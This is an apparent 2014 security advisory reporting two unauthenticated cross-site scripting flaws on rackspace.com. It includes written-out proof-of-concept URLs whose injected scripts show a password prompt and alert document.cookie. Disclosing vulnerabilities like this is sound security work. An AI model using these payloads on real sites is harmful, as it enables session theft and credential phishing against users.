Rackspace Cross Site Scripting

[Aerosol]

Services Affected: http://www.Rackspace.com

Threat Level: High

Severity: High

CVSS Severity Score: 7.0

Impact type: Complete confidentiality, integrity and availability violation.

Vulnerability:

(2) Unauthenticated Cross-Site Scripting Vulnerabilities / HTML Injections

(2) Filtration Bypass

Vendor Overview

Rackspace Inc. is a managed cloud computing company based in Windcrest, Texas, USA a suburb of

San Antonio, Texas. The company has offices in Australia, U.K, Switzerland, Israel, The Netherlands,

India and Hong Kong; with data centers located in various states such as Texas, Illinois, Virginia.

Rackspace is the global leader in hybrid cloud and the founder of OpenStack, the open-source operating

system for the cloud. [1]

The company was founded in 1998 by Richard Yoo and Dirk Elmendorf in San Antonio, Texas. [1]

Proof of Concept

http://www.rackspace.com/information/legal/copyrights_trademarks?"></script><script>alert(String.fromCh
arCode(65,73,83));alert("Security");alert("Corporation");prompt("Enter-Password:");</script> 

Proof of Concept

http://www.rackspace.com/pt/information/legal/mailterms?'"--
></style></script><script>alert(String.fromcharCode(65,73,83));alert(document.cookie);</script>

References

• [1] Wikipedia (2014). Rackspace | Wikipedia Rackspace. [Online] Available at:
  
• Rackspace - Wikipedia, the free encyclopedia [Last Accessed 15 Apr. 2014]
  
• [2] OWASP Website. (2014). Cross-Site Scripting (XSS) [Online] Available at:
  
• https://www.owasp.org/index.php/Cross_site_scripting [Last Accessed 15 Apr. 2014]
  
• [3] Microsoft Corporation. (2014). Microsoft Support | How to prevent Cross-Site Scripting attacks [Online] Available at:
  
• How to prevent cross-site scripting security issues [Last Accessed 15 Apr. 2014]
  

Read more: http://dl.packetstormsecurity.net/1502-exploits/Rackspace-Report.pdf